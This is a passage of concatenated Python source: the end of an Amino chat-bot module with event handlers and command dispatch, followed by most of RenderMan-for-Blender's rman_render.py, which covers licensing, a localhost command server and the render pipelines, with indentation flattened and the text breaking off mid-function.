foo = {'staff': args.subClient.is_in_staff,
'bot': self.is_it_bot}
for i in can:
if foo[i](id_):
return True
def check_all(self):
amino_list = self.sub_clients()
for com in amino_list.comId:
try:
self.communaute[com].check_in()
except Exception:
pass
def threadLaunch(self, commu, passive: bool=False):
self.communaute[commu] = Bot(self, commu, self.prefix, self.bio, passive)
slp(30)
if passive:
self.communaute[commu].passive()
def launch(self, passive: bool = False):
amino_list = self.sub_clients()
self.len_community = len(amino_list.comId)
[Thread(target=self.threadLaunch, args=[commu, passive]).start() for commu in amino_list.comId]
if self.launched:
return
if self.categorie_exist("command") or self.categorie_exist("answer"):
self.launch_text_message()
if self.categorie_exist("on_member_join_chat"):
self.launch_on_member_join_chat()
if self.categorie_exist("on_member_leave_chat"):
self.launch_on_member_leave_chat()
if self.categorie_exist("on_other"):
self.launch_other_message()
if self.categorie_exist("on_remove"):
self.launch_removed_message()
if self.categorie_exist("on_delete"):
self.launch_delete_message()
if self.categorie_exist("on_all"):
self.launch_all_message()
if self.categorie_exist("on_event"):
self.launch_on_event()
self.launched = True
def single_launch(self, commu, passive: bool = False):
amino_list = self.sub_clients()
self.len_community = len(amino_list.comId)
Thread(target=self.threadLaunch, args=[commu, passive]).start()
if self.launched:
return
if self.categorie_exist("command") or self.categorie_exist("answer"):
self.launch_text_message()
if self.categorie_exist("on_member_join_chat"):
self.launch_on_member_join_chat()
if self.categorie_exist("on_member_leave_chat"):
self.launch_on_member_leave_chat()
if self.categorie_exist("on_other"):
self.launch_other_message()
if self.categorie_exist("on_remove"):
self.launch_removed_message()
if self.categorie_exist("on_delete"):
self.launch_delete_message()
if self.categorie_exist("on_all"):
self.launch_all_message()
self.launched = True
def message_analyse(self, data, type):
try:
commuId = data.comId
subClient = self.get_community(commuId)
except Exception:
return
args = Parameters(data, subClient)
Thread(target=self.execute, args=[type, args, type]).start()
def on_member_event(self, data, type):
try:
commuId = data.comId
subClient = self.get_community(commuId)
except Exception:
return
args = Parameters(data, subClient)
if not self.check(args, "bot"):
Thread(target=self.execute, args=[type, args, type]).start()
def launch_text_message(self):
@self.event("on_text_message")
def on_text_message(data):
try:
commuId = data.comId
subClient = self.get_community(commuId)
except Exception:
return
args = Parameters(data, subClient)
if "on_message" in self.commands.keys():
Thread(target=self.execute, args=["on_message", args, "on_message"]).start()
if not self.check(args, 'staff', 'bot') and subClient.banned_words:
self.check_banned_words(args)
if not self.timed_out(args.authorId) and args.message.startswith(subClient.prefix) and not self.check(args, "bot"):
subClient.send_message(args.chatId, self.spam_message)
return
elif "command" in self.commands.keys() and args.message.startswith(subClient.prefix) and not self.check(args, "bot"):
print(f"{args.author} : {args.message}")
command = args.message.lower().split()[0][len(subClient.prefix):]
if command in subClient.locked_command:
subClient.send_message(args.chatId, self.lock_message)
return
args.message = ' '.join(args.message.split()[1:])
self.time_user(args.authorId, self.wait)
if command.lower() in self.commands["command"].keys():
Thread(target=self.execute, args=[command, args]).start()
elif self.no_command_message:
subClient.send_message(args.chatId, self.no_command_message)
return
elif "answer" in self.commands.keys() and args.message.lower() in self.commands["answer"] and not self.check(args, "bot"):
print(f"{args.author} : {args.message}")
self.time_user(args.authorId, self.wait)
Thread(target=self.execute, args=[args.message.lower(), args, "answer"]).start()
return
def launch_other_message(self):
for type_name in ("on_strike_message", "on_voice_chat_not_answered",
"on_voice_chat_not_cancelled", "on_voice_chat_not_declined",
"on_video_chat_not_answered", "on_video_chat_not_cancelled",
"on_video_chat_not_declined", "on_voice_chat_start", "on_video_chat_start",
"on_voice_chat_end", "on_video_chat_end", "on_screen_room_start",
"on_screen_room_end", "on_avatar_chat_start", "on_avatar_chat_end"):
@self.event(type_name)
def on_other_message(data):
self.message_analyse(data, "on_other")
def launch_all_message(self):
for x in (self.chat_methods):
@self.event(self.chat_methods[x].__name__)
def on_all_message(data):
self.message_analyse(data, "on_all")
def launch_delete_message(self):
@self.event("on_delete_message")
def on_delete_message(data):
self.message_analyse(data, "on_delete")
def launch_removed_message(self):
for type_name in ("on_chat_removed_message", "on_text_message_force_removed", "on_text_message_removed_by_admin", "on_delete_message"):
@self.event(type_name)
def on_chat_removed(data):
self.message_analyse(data, "on_remove")
def launch_on_member_join_chat(self):
@self.event("on_group_member_join")
def on_group_member_join(data):
self.on_member_event(data, "on_member_join_chat")
def launch_on_member_leave_chat(self):
@self.event("on_group_member_leave")
def on_group_member_leave(data):
self.on_member_event(data, "on_member_leave_chat")
def launch_on_event(self):
for k, v in self.commands["on_event"].items():
@self.event(k)
def _function(data):
v(data)
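# Illustrative usage sketch (not part of the original module): the minimal way
# to bring the bot up. The credentials are placeholders; commands and answers
# are registered through the decorators provided by the Command mixin (not
# shown here), after which launch() spawns one Bot thread per community and
# wires up only the event handlers whose categories are actually in use.
def _demo_run_bot():
    bot = BotAmino(email="bot@example.com", password="hunter2")
    bot.prefix = "!"
    bot.wait = 5  # cooldown passed to the TimeOut mixin's time_user()
    bot.launch(passive=False)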
|
rman_render.py
|
import time
import os
import rman
import bpy
import sys
from .rman_constants import RFB_VIEWPORT_MAX_BUCKETS, RMAN_RENDERMAN_BLUE
from .rman_scene import RmanScene
from .rman_scene_sync import RmanSceneSync
from . import rman_spool
from . import chatserver
from .rfb_logger import rfb_log
import socketserver
import threading
import subprocess
import ctypes
import numpy
import traceback
# for viewport buckets
import gpu
from gpu_extras.batch import batch_for_shader
# utils
from .rfb_utils.envconfig_utils import envconfig
from .rfb_utils import string_utils
from .rfb_utils import display_utils
from .rfb_utils import scene_utils
from .rfb_utils.prefs_utils import get_pref
# config
from .rman_config import __RFB_CONFIG_DICT__ as rfb_config
# roz stats
from .rman_stats import RfBStatsManager
__RMAN_RENDER__ = None
__RMAN_IT_PORT__ = -1
__BLENDER_DSPY_PLUGIN__ = None
__DRAW_THREAD__ = None
__RMAN_STATS_THREAD__ = None
def __turn_off_viewport__():
'''
Loop through all of the windows/areas and turn shading to SOLID
for all view_3d areas.
'''
rfb_log().debug("Attempting to turn off viewport render")
for window in bpy.context.window_manager.windows:
for area in window.screen.areas:
if area.type == 'VIEW_3D':
for space in area.spaces:
if space.type == 'VIEW_3D':
space.shading.type = 'SOLID'
area.tag_redraw()
def __update_areas__():
for window in bpy.context.window_manager.windows:
for area in window.screen.areas:
area.tag_redraw()
def __draw_callback__():
# callback function for the display driver to call tag_redraw
global __RMAN_RENDER__
if __RMAN_RENDER__.rman_is_viewport_rendering and __RMAN_RENDER__.bl_engine:
try:
__RMAN_RENDER__.bl_engine.tag_redraw()
pass
except ReferenceError as e:
return False
return True
return False
DRAWCALLBACK_FUNC = ctypes.CFUNCTYPE(ctypes.c_bool)
__CALLBACK_FUNC__ = DRAWCALLBACK_FUNC(__draw_callback__)
class ItHandler(chatserver.ItBaseHandler):
def dspyRender(self):
global __RMAN_RENDER__
if not __RMAN_RENDER__.is_running:
bpy.ops.render.render(layer=bpy.context.view_layer.name)
def dspyIPR(self):
global __RMAN_RENDER__
if __RMAN_RENDER__.rman_interactive_running:
crop = []
for c in self.msg.getOpt('crop').split(' '):
crop.append(float(c))
if len(crop) == 4:
__RMAN_RENDER__.rman_scene_sync.update_cropwindow(crop)
def stopRender(self):
global __RMAN_RENDER__
rfb_log().debug("Stop Render Requested.")
if __RMAN_RENDER__.rman_interactive_running:
__turn_off_viewport__()
__RMAN_RENDER__.del_bl_engine()
def selectObjectById(self):
global __RMAN_RENDER__
obj_id = int(self.msg.getOpt('id', '0'))
if obj_id < 0 or not (obj_id in __RMAN_RENDER__.rman_scene.obj_hash):
return
name = __RMAN_RENDER__.rman_scene.obj_hash[obj_id]
rfb_log().debug('ID: %d Obj Name: %s' % (obj_id, name))
obj = bpy.context.scene.objects[name]
if obj:
if bpy.context.view_layer.objects.active:
bpy.context.view_layer.objects.active.select_set(False)
obj.select_set(True)
bpy.context.view_layer.objects.active = obj
def selectSurfaceById(self):
self.selectObjectById()
window = bpy.context.window_manager.windows[0]
if window.screen:
for a in window.screen.areas:
if a.type == "PROPERTIES":
for s in a.spaces:
if s.type == "PROPERTIES":
try:
s.context = "MATERIAL"
except:
pass
return
def start_cmd_server():
global __RMAN_IT_PORT__
if __RMAN_IT_PORT__ != -1:
return __RMAN_IT_PORT__
# zero port makes the OS pick one
host, port = "localhost", 0
# install handler
chatserver.protocols['it'] = ItHandler
# Create the server, binding to localhost on some port
server = socketserver.TCPServer((host, port),
chatserver.CommandHandler)
ip, port = server.server_address
thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
thread.daemon = True
thread.start()
__RMAN_IT_PORT__ = port
return __RMAN_IT_PORT__
def draw_threading_func(db):
refresh_rate = get_pref('rman_viewport_refresh_rate', default=0.01)
while db.rman_is_live_rendering:
if not scene_utils.any_areas_shading():
# if there are no 3d viewports, stop IPR
db.del_bl_engine()
break
if db.rman_is_xpu:
if db.has_buffer_updated():
try:
db.bl_engine.tag_redraw()
db.reset_buffer_updated()
except ReferenceError as e:
# calling tag_redraw has failed. This might mean
# that there are no more view_3d areas that are shading. Try to
# stop IPR.
#rfb_log().debug("Error calling tag_redraw (%s). Aborting..." % str(e))
db.del_bl_engine()
return
time.sleep(refresh_rate)
else:
time.sleep(1.0)
def call_stats_export_payloads(db):
while db.rman_is_exporting:
db.stats_mgr.update_payloads()
time.sleep(0.1)
def call_stats_update_payloads(db):
while db.rman_running:
if not db.bl_engine:
break
if db.rman_is_xpu and db.is_regular_rendering():
# stop the render if we are rendering in XPU mode
# and we've reached ~100%
if float(db.stats_mgr._progress) > 98.0:
db.rman_is_live_rendering = False
break
db.stats_mgr.update_payloads()
time.sleep(0.1)
def progress_cb(e, d, db):
if not db.stats_mgr.is_connected():
# set the progress in stats_mgr
# we can at least get progress from the event callback
# in case the stats listener is not connected
db.stats_mgr._progress = int(d)
if db.rman_is_live_rendering and int(d) == 100:
db.rman_is_live_rendering = False
def bake_progress_cb(e, d, db):
if not db.stats_mgr.is_connected():
db.stats_mgr._progress = int(d)
def batch_progress_cb(e, d, db):
# just tell the stats mgr to draw
db.stats_mgr._progress = int(d)
db.stats_mgr.draw_render_stats()
print("R90000 %4d%%" % int(d), file = sys.stderr )
sys.stderr.flush()
def render_cb(e, d, db):
if d == 0:
rfb_log().debug("RenderMan has exited.")
if db.rman_is_live_rendering:
db.rman_is_live_rendering = False
def live_render_cb(e, d, db):
if d == 0:
db.rman_is_refining = False
else:
db.rman_is_refining = True
def preload_xpu():
"""On linux there is a problem with std::call_once and
blender, by default, being linked with a static libstdc++.
The loader seems to not be able to get the right tls key
for the __once_call global when libprman loads libxpu. By preloading
we end up calling the proxy in the blender executable and
that works.
Returns:
ctypes.CDLL of xpu or None if that fails. None if not on linux
"""
if sys.platform != 'linux':
return None
tree = envconfig().rmantree
xpu_path = os.path.join(tree, 'lib', 'libxpu.so')
try:
xpu = ctypes.CDLL(xpu_path)
return xpu
except OSError as error:
rfb_log().debug('Failed to preload xpu: {0}'.format(error))
return None
class RmanRender(object):
'''
RmanRender class. This class is responsible for starting and stopping
the renderer. There should only be one instance of this class per session.
Do not create an instance of this class directly. Use RmanRender.get_rman_render()
'''
def __init__(self):
global __RMAN_RENDER__
self.rictl = rman.RiCtl.Get()
self.sgmngr = rman.SGManager.Get()
self.rman = rman
self.sg_scene = None
self.rman_scene = RmanScene(rman_render=self)
self.rman_scene_sync = RmanSceneSync(rman_render=self, rman_scene=self.rman_scene)
self.bl_engine = None
self.rman_running = False
self.rman_is_exporting = False
self.rman_interactive_running = False
self.rman_swatch_render_running = False
self.rman_is_live_rendering = False
self.rman_is_viewport_rendering = False
self.rman_is_xpu = False
self.rman_is_refining = False
self.rman_render_into = 'blender'
self.rman_license_failed = False
self.rman_license_failed_message = ''
self.it_port = -1
self.rman_callbacks = dict()
self.viewport_res_x = -1
self.viewport_res_y = -1
self.viewport_buckets = list()
self._draw_viewport_buckets = False
self.stats_mgr = RfBStatsManager(self)
self.deleting_bl_engine = threading.Lock()
self.stop_render_mtx = threading.Lock()
self._start_prman_begin()
# hold onto this or python will unload it
self.preload_xpu = preload_xpu()
@classmethod
def get_rman_render(self):
global __RMAN_RENDER__
if __RMAN_RENDER__ is None:
__RMAN_RENDER__ = RmanRender()
return __RMAN_RENDER__
@property
def bl_engine(self):
return self.__bl_engine
@bl_engine.setter
def bl_engine(self, bl_engine):
self.__bl_engine = bl_engine
def _start_prman_begin(self):
argv = []
argv.append("prman")
#argv.append("-Progress")
argv.append("-dspyserver")
argv.append("%s" % envconfig().rman_it_path)
argv.append("-statssession")
argv.append(self.stats_mgr.rman_stats_session_name)
        woffs = ','.join(rfb_config['woffs'])
if woffs:
argv.append('-woff')
argv.append(woffs)
self.rictl.PRManBegin(argv)
def __del__(self):
self.rictl.PRManEnd()
def del_bl_engine(self):
if not self.bl_engine:
return
if not self.deleting_bl_engine.acquire(timeout=2.0):
return
self.bl_engine = None
self.deleting_bl_engine.release()
def _append_render_cmd(self, render_cmd):
return render_cmd
def _dump_rib_(self, frame=1):
if envconfig().getenv('RFB_DUMP_RIB'):
rfb_log().debug("Writing to RIB...")
rib_time_start = time.time()
if sys.platform == ("win32"):
self.sg_scene.Render("rib C:/tmp/blender.%04d.rib -format ascii -indent" % frame)
else:
self.sg_scene.Render("rib /var/tmp/blender.%04d.rib -format ascii -indent" % frame)
rfb_log().debug("Finished writing RIB. Time: %s" % string_utils._format_time_(time.time() - rib_time_start))
def _load_placeholder_image(self):
placeholder_image = os.path.join(envconfig().rmantree, 'lib', 'textures', 'placeholder.png')
render = self.bl_scene.render
image_scale = 100.0 / render.resolution_percentage
result = self.bl_engine.begin_result(0, 0,
render.resolution_x * image_scale,
render.resolution_y * image_scale)
lay = result.layers[0]
try:
lay.load_from_file(placeholder_image)
except:
pass
self.bl_engine.end_result(result)
def _call_brickmake_for_selected(self):
rm = self.bl_scene.renderman
ob = bpy.context.active_object
if rm.external_animation:
for frame in range(self.bl_scene.frame_start, self.bl_scene.frame_end + 1):
expanded_str = string_utils.expand_string(ob.renderman.bake_filename_attr, frame=self.bl_scene.frame_current)
ptc_file = '%s.ptc' % expanded_str
bkm_file = '%s.bkm' % expanded_str
args = []
args.append('%s/bin/brickmake' % envconfig().rmantree)
args.append('-progress')
args.append('2')
args.append(ptc_file)
args.append(bkm_file)
subprocess.run(args)
else:
expanded_str = string_utils.expand_string(ob.renderman.bake_filename_attr, frame=self.bl_scene.frame_current)
ptc_file = '%s.ptc' % expanded_str
bkm_file = '%s.bkm' % expanded_str
args = []
args.append('%s/bin/brickmake' % envconfig().rmantree)
args.append('-progress')
args.append('2')
args.append(ptc_file)
args.append(bkm_file)
subprocess.run(args)
def _check_prman_license(self):
if not envconfig().is_valid_license:
self.rman_license_failed = True
self.rman_license_failed_message = 'Cannot find a valid RenderMan license. Aborting.'
elif not envconfig().has_rps_license:
self.rman_license_failed = True
self.rman_license_failed_message = 'Cannot find RPS-%s license feature. Aborting.' % (envconfig().feature_version)
else:
# check for any available PhotoRealistic-RenderMan licenses
status = envconfig().get_prman_license_status()
if not(status.found and status.is_available):
self.rman_license_failed = True
self.rman_license_failed_message = 'No PhotoRealistic-RenderMan licenses available. Aborting.'
elif status.is_expired():
self.rman_license_failed = True
self.rman_license_failed_message = 'PhotoRealistic-RenderMan licenses have expired (%s).' % str(status.exp_date)
if self.rman_license_failed:
if not self.rman_interactive_running:
self.bl_engine.report({'ERROR'}, self.rman_license_failed_message)
self.stop_render()
return False
return True
def is_regular_rendering(self):
# return if we are doing a regular render and not interactive
return (self.rman_running and not self.rman_interactive_running)
def do_draw_buckets(self):
return get_pref('rman_viewport_draw_bucket', default=True) and self.rman_is_refining
def do_draw_progressbar(self):
return get_pref('rman_viewport_draw_progress') and self.stats_mgr.is_connected() and self.stats_mgr._progress < 100
def start_export_stats_thread(self):
# start an export stats thread
global __RMAN_STATS_THREAD__
__RMAN_STATS_THREAD__ = threading.Thread(target=call_stats_export_payloads, args=(self, ))
__RMAN_STATS_THREAD__.start()
def start_stats_thread(self):
# start a stats thread so we can periodically call update_payloads
global __RMAN_STATS_THREAD__
if __RMAN_STATS_THREAD__:
__RMAN_STATS_THREAD__.join()
__RMAN_STATS_THREAD__ = None
__RMAN_STATS_THREAD__ = threading.Thread(target=call_stats_update_payloads, args=(self, ))
__RMAN_STATS_THREAD__.start()
def reset(self):
self.rman_license_failed = False
self.rman_license_failed_message = ''
self.rman_is_xpu = False
self.rman_is_refining = False
def start_render(self, depsgraph, for_background=False):
self.reset()
self.bl_scene = depsgraph.scene_eval
rm = self.bl_scene.renderman
self.it_port = start_cmd_server()
rfb_log().info("Parsing scene...")
time_start = time.time()
if not self._check_prman_license():
return False
if for_background:
self.rman_render_into = ''
is_external = True
self.rman_callbacks.clear()
ec = rman.EventCallbacks.Get()
ec.RegisterCallback("Render", render_cb, self)
self.rman_callbacks["Render"] = render_cb
if envconfig().getenv('RFB_BATCH_NO_PROGRESS') is None:
ec.RegisterCallback("Progress", batch_progress_cb, self)
self.rman_callbacks["Progress"] = batch_progress_cb
rman.Dspy.DisableDspyServer()
else:
self.rman_render_into = rm.render_into
is_external = False
self.rman_callbacks.clear()
ec = rman.EventCallbacks.Get()
ec.RegisterCallback("Progress", progress_cb, self)
self.rman_callbacks["Progress"] = progress_cb
ec.RegisterCallback("Render", render_cb, self)
self.rman_callbacks["Render"] = render_cb
try:
if self.rman_render_into == 'it':
rman.Dspy.EnableDspyServer()
else:
rman.Dspy.DisableDspyServer()
except:
pass
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
rendervariant = scene_utils.get_render_variant(self.bl_scene)
scene_utils.set_render_variant_config(self.bl_scene, config, render_config)
self.rman_is_xpu = (rendervariant == 'xpu')
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
was_connected = self.stats_mgr.is_connected()
if self.rman_is_xpu and self.rman_render_into == 'blender':
if not was_connected:
# force the stats to start in the case of XPU
# this is so that we can get a progress percentage
# if we can't get it to start, abort
self.stats_mgr.attach()
time.sleep(0.5) # give it a second to attach
if not self.stats_mgr.is_connected():
self.bl_engine.report({'ERROR'}, 'Cannot start live stats. Aborting XPU render')
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
try:
bl_layer = depsgraph.view_layer
self.rman_is_exporting = True
self.rman_running = True
self.start_export_stats_thread()
self.rman_scene.export_for_final_render(depsgraph, self.sg_scene, bl_layer, is_external=is_external)
self.rman_is_exporting = False
self.stats_mgr.reset_progress()
self._dump_rib_(self.bl_scene.frame_current)
rfb_log().info("Finished parsing scene. Total time: %s" % string_utils._format_time_(time.time() - time_start))
self.rman_is_live_rendering = True
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
render_cmd = "prman"
if self.rman_render_into == 'blender':
render_cmd = "prman -live"
render_cmd = self._append_render_cmd(render_cmd)
self.sg_scene.Render(render_cmd)
if self.rman_render_into == 'blender':
dspy_dict = display_utils.get_dspy_dict(self.rman_scene)
render = self.rman_scene.bl_scene.render
render_view = self.bl_engine.active_view_get()
image_scale = render.resolution_percentage / 100.0
width = int(render.resolution_x * image_scale)
height = int(render.resolution_y * image_scale)
bl_image_rps= dict()
# register any AOV's as passes
for i, dspy_nm in enumerate(dspy_dict['displays'].keys()):
if i == 0:
continue
num_channels = -1
while num_channels == -1:
num_channels = self.get_numchannels(i)
dspy = dspy_dict['displays'][dspy_nm]
dspy_chan = dspy['params']['displayChannels'][0]
chan_info = dspy_dict['channels'][dspy_chan]
chan_type = chan_info['channelType']['value']
if num_channels == 4:
self.bl_engine.add_pass(dspy_nm, 4, 'RGBA')
elif num_channels == 3:
if chan_type == 'color':
self.bl_engine.add_pass(dspy_nm, 3, 'RGB')
else:
self.bl_engine.add_pass(dspy_nm, 3, 'XYZ')
elif num_channels == 2:
self.bl_engine.add_pass(dspy_nm, 2, 'XY')
else:
self.bl_engine.add_pass(dspy_nm, 1, 'X')
size_x = width
size_y = height
if render.use_border:
size_x = int(width * (render.border_max_x - render.border_min_x))
size_y = int(height * (render.border_max_y - render.border_min_y))
result = self.bl_engine.begin_result(0, 0,
size_x,
size_y,
view=render_view)
for i, dspy_nm in enumerate(dspy_dict['displays'].keys()):
if i == 0:
render_pass = result.layers[0].passes.find_by_name("Combined", render_view)
else:
render_pass = result.layers[0].passes.find_by_name(dspy_nm, render_view)
bl_image_rps[i] = render_pass
if self.rman_is_xpu:
# FIXME: for now, add a 1 second delay before starting the stats thread
# for some reason, XPU doesn't seem to reset the progress between renders
time.sleep(1.0)
self.start_stats_thread()
while self.bl_engine and not self.bl_engine.test_break() and self.rman_is_live_rendering:
time.sleep(0.01)
for i, rp in bl_image_rps.items():
buffer = self._get_buffer(width, height, image_num=i,
num_channels=rp.channels,
as_flat=False,
back_fill=False,
render=render)
if buffer:
rp.rect = buffer
if self.bl_engine:
self.bl_engine.update_result(result)
if result:
if self.bl_engine:
self.bl_engine.end_result(result)
            # Try to save the displays out to disk. This matches
            # Cycles' behavior.
for i, dspy_nm in enumerate(dspy_dict['displays'].keys()):
filepath = dspy_dict['displays'][dspy_nm]['filePath']
buffer = self._get_buffer(width, height, image_num=i, as_flat=True)
if buffer:
bl_image = bpy.data.images.new(dspy_nm, width, height)
try:
bl_image.use_generated_float = True
bl_image.filepath_raw = filepath
bl_image.pixels = buffer
bl_image.file_format = 'OPEN_EXR'
bl_image.update()
bl_image.save()
except:
pass
finally:
bpy.data.images.remove(bl_image)
if not was_connected and self.stats_mgr.is_connected():
# if stats were not started before rendering, disconnect
self.stats_mgr.disconnect()
else:
self.start_stats_thread()
while self.bl_engine and not self.bl_engine.test_break() and self.rman_is_live_rendering:
time.sleep(0.01)
self.del_bl_engine()
self.stop_render()
return True
def start_external_render(self, depsgraph):
bl_scene = depsgraph.scene_eval
rm = bl_scene.renderman
self.rman_running = True
self.rman_render_into = ''
rib_options = ""
if rm.rib_compression == "gzip":
rib_options += " -compression gzip"
rib_format = 'ascii'
if rm.rib_format == 'binary':
rib_format = 'binary'
rib_options += " -format %s" % rib_format
if rib_format == "ascii":
rib_options += " -indent"
if rm.external_animation:
original_frame = bl_scene.frame_current
rfb_log().debug("Writing to RIB...")
for frame in range(bl_scene.frame_start, bl_scene.frame_end + 1):
bl_view_layer = depsgraph.view_layer
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
self.bl_engine.frame_set(frame, subframe=0.0)
self.rman_is_exporting = True
self.rman_scene.export_for_final_render(depsgraph, self.sg_scene, bl_view_layer, is_external=True)
self.rman_is_exporting = False
rib_output = string_utils.expand_string(rm.path_rib_output,
frame=frame,
asFilePath=True)
self.sg_scene.Render("rib %s %s" % (rib_output, rib_options))
self.sgmngr.DeleteScene(self.sg_scene)
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
self.bl_engine.frame_set(original_frame, subframe=0.0)
else:
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
time_start = time.time()
bl_view_layer = depsgraph.view_layer
rfb_log().info("Parsing scene...")
self.rman_is_exporting = True
self.rman_scene.export_for_final_render(depsgraph, self.sg_scene, bl_view_layer, is_external=True)
self.rman_is_exporting = False
rib_output = string_utils.expand_string(rm.path_rib_output,
frame=bl_scene.frame_current,
asFilePath=True)
rfb_log().debug("Writing to RIB: %s..." % rib_output)
rib_time_start = time.time()
self.sg_scene.Render("rib %s %s" % (rib_output, rib_options))
rfb_log().debug("Finished writing RIB. Time: %s" % string_utils._format_time_(time.time() - rib_time_start))
rfb_log().info("Finished parsing scene. Total time: %s" % string_utils._format_time_(time.time() - time_start))
self.sgmngr.DeleteScene(self.sg_scene)
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
if rm.queuing_system != 'none':
spooler = rman_spool.RmanSpool(self, self.rman_scene, depsgraph)
spooler.batch_render()
self.rman_running = False
self.sg_scene = None
self.del_bl_engine()
return True
def start_bake_render(self, depsgraph, for_background=False):
self.reset()
self.bl_scene = depsgraph.scene_eval
rm = self.bl_scene.renderman
self.it_port = start_cmd_server()
rfb_log().info("Parsing scene...")
time_start = time.time()
if not self._check_prman_license():
return False
if for_background:
is_external = True
self.rman_callbacks.clear()
ec = rman.EventCallbacks.Get()
ec.RegisterCallback("Render", render_cb, self)
self.rman_callbacks["Render"] = render_cb
rman.Dspy.DisableDspyServer()
else:
is_external = False
self.rman_callbacks.clear()
ec = rman.EventCallbacks.Get()
ec.RegisterCallback("Progress", bake_progress_cb, self)
self.rman_callbacks["Progress"] = bake_progress_cb
ec.RegisterCallback("Render", render_cb, self)
self.rman_callbacks["Render"] = render_cb
self.rman_render_into = ''
rman.Dspy.DisableDspyServer()
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
bl_layer = depsgraph.view_layer
self.rman_is_exporting = True
self.rman_running = True
self.start_export_stats_thread()
self.rman_scene.export_for_bake_render(depsgraph, self.sg_scene, bl_layer, is_external=is_external)
self.rman_is_exporting = False
self._dump_rib_(self.bl_scene.frame_current)
rfb_log().info("Finished parsing scene. Total time: %s" % string_utils._format_time_(time.time() - time_start))
render_cmd = "prman -blocking"
render_cmd = self._append_render_cmd(render_cmd)
self.sg_scene.Render(render_cmd)
self.start_stats_thread()
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
self.stop_render()
if rm.hider_type == 'BAKE_BRICKMAP_SELECTED':
self._call_brickmake_for_selected()
self.del_bl_engine()
return True
def start_external_bake_render(self, depsgraph):
bl_scene = depsgraph.scene_eval
rm = bl_scene.renderman
self.rman_running = True
self.rman_render_into = ''
rib_options = ""
if rm.rib_compression == "gzip":
rib_options += " -compression gzip"
rib_format = 'ascii'
if rm.rib_format == 'binary':
rib_format = 'binary'
rib_options += " -format %s" % rib_format
if rib_format == "ascii":
rib_options += " -indent"
if rm.external_animation:
original_frame = bl_scene.frame_current
rfb_log().debug("Writing to RIB...")
for frame in range(bl_scene.frame_start, bl_scene.frame_end + 1):
bl_view_layer = depsgraph.view_layer
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
self.bl_engine.frame_set(frame, subframe=0.0)
self.rman_is_exporting = True
self.rman_scene.export_for_bake_render(depsgraph, self.sg_scene, bl_view_layer, is_external=True)
self.rman_is_exporting = False
rib_output = string_utils.expand_string(rm.path_rib_output,
frame=frame,
asFilePath=True)
self.sg_scene.Render("rib %s %s" % (rib_output, rib_options))
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
self.sgmngr.DeleteScene(self.sg_scene)
self.bl_engine.frame_set(original_frame, subframe=0.0)
else:
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
time_start = time.time()
bl_view_layer = depsgraph.view_layer
rfb_log().info("Parsing scene...")
self.rman_is_exporting = True
self.rman_scene.export_for_bake_render(depsgraph, self.sg_scene, bl_view_layer, is_external=True)
self.rman_is_exporting = False
rib_output = string_utils.expand_string(rm.path_rib_output,
frame=bl_scene.frame_current,
asFilePath=True)
rfb_log().debug("Writing to RIB: %s..." % rib_output)
rib_time_start = time.time()
self.sg_scene.Render("rib %s %s" % (rib_output, rib_options))
rfb_log().debug("Finished writing RIB. Time: %s" % string_utils._format_time_(time.time() - rib_time_start))
rfb_log().info("Finished parsing scene. Total time: %s" % string_utils._format_time_(time.time() - time_start))
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
self.sgmngr.DeleteScene(self.sg_scene)
if rm.queuing_system != 'none':
spooler = rman_spool.RmanSpool(self, self.rman_scene, depsgraph)
spooler.batch_render()
self.rman_running = False
self.sg_scene = None
self.del_bl_engine()
return True
def start_interactive_render(self, context, depsgraph):
global __DRAW_THREAD__
self.reset()
self.rman_interactive_running = True
self.rman_running = True
__update_areas__()
self.bl_scene = depsgraph.scene_eval
rm = depsgraph.scene_eval.renderman
self.it_port = start_cmd_server()
render_into_org = ''
self.rman_render_into = rm.render_ipr_into
self.rman_callbacks.clear()
# register the blender display driver
try:
if self.rman_render_into == 'blender':
# turn off dspyserver mode if we're not rendering to "it"
self.rman_is_viewport_rendering = True
rman.Dspy.DisableDspyServer()
self.rman_callbacks.clear()
ec = rman.EventCallbacks.Get()
ec.RegisterCallback("Render", live_render_cb, self)
self.rman_callbacks["Render"] = live_render_cb
self.viewport_buckets.clear()
self._draw_viewport_buckets = True
else:
rman.Dspy.EnableDspyServer()
except:
# force rendering to 'it'
rfb_log().error('Could not register Blender display driver. Rendering to "it".')
render_into_org = rm.render_ipr_into
rm.render_ipr_into = 'it'
self.rman_render_into = 'it'
